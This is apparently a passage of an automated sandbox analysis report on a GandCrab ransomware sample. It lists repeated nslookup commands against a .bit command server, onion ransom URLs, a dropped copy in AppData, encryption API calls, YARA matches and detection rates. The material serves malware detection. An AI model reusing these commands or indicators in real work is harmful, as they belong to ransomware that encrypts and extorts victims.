                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeDNS query: name: ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeDNS query: name: ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeDNS query: name: ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeDNS query: name: ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeDNS query: name: ipv4bot.whatismyipaddress.com
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: http://gdcbghvjyqy7jclk.onion/e644d32fec6144de
                    Source: 9gkAKTWOXp.exe, vkspii.exe.1.drString found in binary or memory: https://www.torproject.org/
                    Source: unknownDNS traffic detected: queries for: ipv4bot.whatismyipaddress.com
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407A00 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,1_2_00407A00

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: Yara matchFile source: 9gkAKTWOXp.exe, type: SAMPLE
                    Source: Yara matchFile source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9gkAKTWOXp.exe PID: 4664, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vkspii.exe PID: 6028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vkspii.exe PID: 4024, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPED
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,1_2_00406000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,13_2_00406000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,21_2_00406000
                    Source: nslookup.exeProcess created: 43

                    System Summary

                    barindex
                    Source: 9gkAKTWOXp.exe, type: SAMPLEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPEDMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 9gkAKTWOXp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9gkAKTWOXp.exe, type: SAMPLEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 9gkAKTWOXp.exe, type: SAMPLEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 13.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 13.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 21.2.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 21.0.vkspii.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPEDMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, type: DROPPEDMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004020001_2_00402000
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407EE01_2_00407EE0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_0040200013_2_00402000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_00407EE013_2_00407EE0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_0040200021_2_00402000
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_00407EE021_2_00407EE0
                    Source: 9gkAKTWOXp.exeVirustotal: Detection: 81%
                    Source: 9gkAKTWOXp.exeMetadefender: Detection: 72%
                    Source: 9gkAKTWOXp.exeReversingLabs: Detection: 100%
                    Source: 9gkAKTWOXp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\9gkAKTWOXp.exe "C:\Users\user\Desktop\9gkAKTWOXp.exe"
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                    Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
